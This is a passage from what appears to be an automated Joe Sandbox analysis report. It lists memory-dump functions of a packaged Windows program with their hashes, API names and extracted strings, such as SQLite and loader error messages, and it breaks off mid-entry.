                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952109608.00007FFBA6790000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952154128.00007FFBA68F1000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952154128.00007FFBA68F3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952154128.00007FFBA6908000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952472915.00007FFBA690A000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952519785.00007FFBA690C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba6790000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: 00007B593010
                                                                                                                                                                                                                                  • String ID: Cannot add a NOT NULL column with default value NULL$Cannot add a PRIMARY KEY column$Cannot add a REFERENCES column with non-NULL default value$Cannot add a UNIQUE column$Cannot add a column with non-constant default$SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') WHEN quick_check GLOB 'non-* value in*' THEN raise(ABORT,'type mismatch on DEFAULT') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE$SELECT raise(ABORT,%Q) FROM "%w"."%w"$UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q$cannot add a STORED column
                                                                                                                                                                                                                                  • API String ID: 2201947777-200680935
                                                                                                                                                                                                                                  • Opcode ID: 5b4710b465af85f28d42b2c529d5cd9f71a28c578942a5c84c3729e8c5c3be64
                                                                                                                                                                                                                                  • Instruction ID: 5b48fb79781295ea829a825f609babce88a08958be73fcc2cee4c69132773bef
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5b4710b465af85f28d42b2c529d5cd9f71a28c578942a5c84c3729e8c5c3be64
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8DE19CE1A1AB8285EB678B29E5647B963A6FB44FC4F044132CE8D07B95DF3CE459C301
                                                                                                                                                                                                                                  Function 00007FFBAA494B80 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 134COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: OiII$Unknown Bluetooth protocol$iy#
                                                                                                                                                                                                                                  • API String ID: 0-1931379703
                                                                                                                                                                                                                                  • Opcode ID: 4d8043ebe678415ea9796c3876c5d0c2d5509b23804c6fd0dd0e404e45f50446
                                                                                                                                                                                                                                  • Instruction ID: 918caf3a13ef65030926914ba842d2a839050c38d1cbeeab0175b8c0ce086c60
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d8043ebe678415ea9796c3876c5d0c2d5509b23804c6fd0dd0e404e45f50446
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 435195A5A0EA43D2FA164B71E4C407D63A8FF45790F0041B1EE5E436E1EF2DE466C360
                                                                                                                                                                                                                                  Function 00007FF72C652180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                  • String ID: P%
                                                                                                                                                                                                                                  • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                  • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                  • Instruction ID: c856e71026625c4dcf53e9d161458fe9742495b3ee8c397dc4c6480bcee77c74
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B151E9366047A186D6349F36E4181BAF7A2FBA8B65F404125EFDE43694DF3CD045DB20
                                                                                                                                                                                                                                  Function 00007FF72C6580C0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                  • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                  • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                  • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                  • Instruction ID: c43abbecf4a9d3081e3c19240c48d32a48b423849fa415f034b3ea1467b0ae38
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66218821B08A4381E7526B7AFC45179A352FFA8BF0F984531DB1D437D8DE2CD5958B20
                                                                                                                                                                                                                                  Function 00007FFBA43D3A80 Relevance: 15.2, APIs: 10, Instructions: 227COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949877226.00007FFBA43D1000.00000040.00000001.01000000.00000018.sdmp, Offset: 00007FFBA43D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949827954.00007FFBA43D0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949877226.00007FFBA43DD000.00000040.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949877226.00007FFBA43E0000.00000040.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950013415.00007FFBA43E1000.00000080.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950056718.00007FFBA43E3000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba43d0000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 190073905-0
                                                                                                                                                                                                                                  • Opcode ID: 6519944f3013d940d19d1b81a08512331dda30c88b389df6dfaebd19558cce86
                                                                                                                                                                                                                                  • Instruction ID: 9441ac3371657736457b4d9567160e3a1346b34013c137d63ce1b2f33c6b5408
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6519944f3013d940d19d1b81a08512331dda30c88b389df6dfaebd19558cce86
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 33818DE1E0EE43D6FA52AB76E4C127966E0AF95780F244875DE0D873B6DE3CE8058700
                                                                                                                                                                                                                                  Function 00007FFBAA4C2ED0 Relevance: 15.2, APIs: 10, Instructions: 227COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952893577.00007FFBAA4B1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFBAA4B0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952857331.00007FFBAA4B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952893577.00007FFBAA4CB000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952893577.00007FFBAA4D7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1953017597.00007FFBAA4D8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1953052763.00007FFBAA4DA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa4b0000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 190073905-0
                                                                                                                                                                                                                                  • Opcode ID: cba752f9f13b0038c709412a55bb8b17be48a4cc59ac1a170ee7516abd8a6b31
                                                                                                                                                                                                                                  • Instruction ID: 4acc8f9c5471ca6bdfc2d69daa357b38622d9945180f0441402f1467f83ade77
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cba752f9f13b0038c709412a55bb8b17be48a4cc59ac1a170ee7516abd8a6b31
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2818BE1E0A243D6FA53AF36D4412BAA2A8AF45780F5484B5FD0C47796DF6CF8078620
                                                                                                                                                                                                                                  Function 00007FFBAA492A10 Relevance: 15.2, APIs: 10, Instructions: 227COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 190073905-0
                                                                                                                                                                                                                                  • Opcode ID: d50f978ffc6665eb39f9add3952e07e3b3ad5350cb73a1dc24da42246009ca06
                                                                                                                                                                                                                                  • Instruction ID: 815694afbbda7cb0bb81bbaafbd0e94934c8f78a06141646438c914b4e6a5a1c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d50f978ffc6665eb39f9add3952e07e3b3ad5350cb73a1dc24da42246009ca06
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5819FA1E0E603C6F6569B36D4C12BD6398AF46780F5440B9FE0D477A6DE2CE8678720
                                                                                                                                                                                                                                  Function 00007FFBA4172940 Relevance: 15.2, APIs: 10, Instructions: 227COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949490443.00007FFBA4171000.00000040.00000001.01000000.0000001A.sdmp, Offset: 00007FFBA4170000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949454231.00007FFBA4170000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949490443.00007FFBA41BA000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949490443.00007FFBA41C8000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949490443.00007FFBA4217000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949490443.00007FFBA421C000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949490443.00007FFBA421F000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949749489.00007FFBA4220000.00000080.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949783531.00007FFBA4222000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba4170000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 190073905-0
                                                                                                                                                                                                                                  • Opcode ID: bfa090c531bac24e46e178867b034455b2b04e74abd31691ae896f8f055f72f8
                                                                                                                                                                                                                                  • Instruction ID: e98e819fe2ce1434beeb0ac5b42c514262c9ecf84b4bfa8ba7c5d7c68db00640
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bfa090c531bac24e46e178867b034455b2b04e74abd31691ae896f8f055f72f8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F81AFA0E0E247C6FA67AB75D4C12796E90AF56780F544035DF0C57BB6DE3CE9468B00
                                                                                                                                                                                                                                  Function 00007FFBA66A2C10 Relevance: 15.2, APIs: 10, Instructions: 227COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1951835790.00007FFBA66A1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFBA66A0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951780580.00007FFBA66A0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66AE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66C1000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66CA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66CE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952036399.00007FFBA66D1000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952071427.00007FFBA66D3000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba66a0000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 190073905-0
                                                                                                                                                                                                                                  • Opcode ID: 1a8d1f532519298a9da786a4129d135a06aa4afe88969801cf82f3079a6a7588
                                                                                                                                                                                                                                  • Instruction ID: 8be528e4e204b13d71ed9177a4f1a1ccb764ec7a586de06b95fe44c46117d0c6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a8d1f532519298a9da786a4129d135a06aa4afe88969801cf82f3079a6a7588
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B081BEE0E4E64385F652AB3DDC412F966B6AFA5F80F486434DE0DD7696DE3CE8418E00
                                                                                                                                                                                                                                  Function 00007FF72C666290 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID: -$:$f$p$p
                                                                                                                                                                                                                                  • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                  • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                  • Instruction ID: d6145e58236951280cdc39b865d6008e905f2ee23aaf1e4de42334ebbbf37fb7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B127061E0824386FB227A15F954279F6B3FB60764FE4813DE68A466C4DF7CE5808F21
                                                                                                                                                                                                                                  Function 00007FF72C660FC8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID: f$f$p$p$f
                                                                                                                                                                                                                                  • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                  • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                  • Instruction ID: 808a7fa6049103a88b91e57bc9f78050900597928f8c3b4ea897a958b3d5c613
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17127461E0C14386FB21BA15EC54679F6B3FBA0764FE44039D69A47AC4DB7CE4808F60
                                                                                                                                                                                                                                  Function 00007FF72C651050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentProcess
                                                                                                                                                                                                                                  • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                  • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                  • Opcode ID: 7353426b42f42a82694b3592670e666301d967352ad9965b6266ed7fbff1557c
                                                                                                                                                                                                                                  • Instruction ID: f313f5aa19bce955fab23999e56595ac6e7fc054a09b00b6304cdae7fab1f308
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7353426b42f42a82694b3592670e666301d967352ad9965b6266ed7fbff1557c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD41B521B0865381EA12FB129C016B9F396FFA4BE4FE44931EE0C07785DE3CE5458B60
                                                                                                                                                                                                                                  Function 00007FF72C658660 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetTempPathW.KERNEL32(?,?,00000000,00007FF72C653CBB), ref: 00007FF72C658704
                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,00000000,00007FF72C653CBB), ref: 00007FF72C65870A
                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000,00007FF72C653CBB), ref: 00007FF72C65874C
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C658830: GetEnvironmentVariableW.KERNEL32(00007FF72C65388E), ref: 00007FF72C658867
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C658830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF72C658889
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C668238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72C668251
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C652810: MessageBoxW.USER32 ref: 00007FF72C6528EA
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                  • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                  • Opcode ID: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
                                                                                                                                                                                                                                  • Instruction ID: ccd400955c279738c84ebd1a9837a2eb1e4600d8e859cc44b92fd759b3684798
